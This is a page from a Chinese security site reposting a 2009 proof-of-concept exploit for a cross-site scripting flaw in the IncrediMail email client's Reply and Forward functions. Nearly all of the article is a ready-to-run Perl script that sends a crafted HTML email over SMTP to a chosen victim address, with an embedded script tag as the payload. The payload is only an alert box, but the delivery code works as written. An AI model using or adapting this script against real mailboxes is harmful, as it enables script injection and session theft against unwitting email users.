首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 IncrediMail 5.86 (XSS) Script Execution Exploit 来源：http://minhbq.blogspot.com 作者：Minh 发布时间：2009-03-25   #!/usr/bin/perl -w # IncrediMail Xe (latest version) XSS Vulnerability # # Discovered by : Bui Quang Minh # # Description : The most of popular Mail Client now exclude Script Code for mail content. # It aims to avoid the type of XSS exploitation (For e.g: stolen cookie). # IncrediMail also remove Script Code when the user read mail. # However, I found the "Reply" and "Forward" function of the mail client # has not handled mail content well resulting in XSS vulnerability. # # My Blog : http://minhbq.blogspot.com use Net::SMTP; # ARGV Check if ($#ARGV != 2) { print "\nUSAGE: IncrediMail.pl <Mail Server> <Attacker Email> <VicTim Email>\n"; exit; } $host = $ARGV[0]; $attacker = $ARGV[1]; $victim = $ARGV[2]; # Config SMTP $smtp = Net::SMTP->new( Host => $host, Hello => 'Hello world', Timeout => 30) or die "Couldn't connect to Mail Server\n"; # Attacker and Victim email $smtp->mail($attacker); $smtp->to($victim); # Send email $buffer = "From: XSS Vulnerability\n". "To: XSS Vulnerability\n". "Subject: XSS Vulnerability\n". "MIME-Version: 1.0\n". "Content-Type: multipart/mixed;\n". "    boundary=\"--=45145578442838848853975045745715171602582966277178406402638054315034128543847104614337851625097187549984363453814450535441019\"\n\n". "----=45145578442838848853975045745715171602582966277178406402638054315034128543847104614337851625097187549984363453814450535441019\n". "Content-Type: text/html;\n". " charset=\"utf-8\"\n". "Content-Transfer-Encoding: quoted-printable\n\n". "Reply or Sender for XSS Vulnerability\n". "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0 Transitional//EN\">\n". "<HTML><BODY>\n". "<script> alert('XSS Vulnerability') </script>\n". "</BODY></HTML>\n\n". "----=45145578442838848853975045745715171602582966277178406402638054315034128543847104614337851625097187549984363453814450535441019--"; $smtp->data(); $smtp->datasend($buffer); $smtp->quit(); print "Send Finish.\n";   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Femitter FTP Server 1.x Multip ·ECShop <= v2.6.2 SQL injection ·Microsoft GdiPlus.dll EMF GpFo ·Mozilla Firefox XSL Parsing Re ·Adobe Acrobat Reader JBIG2 Uni ·PHPizabi v0.848b C1 HFP1-3 Rem ·Free Arcade Script 1.0 Auth By ·Syzygy CMS 0.3 LFI/SQL Command ·POP Peeper 3.4.0.0 .html file ·PhotoStand 1.2.0 Remote Comman ·POP Peeper 3.4.0.0 .eml file U ·XM Easy Personal FTP Server <=   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved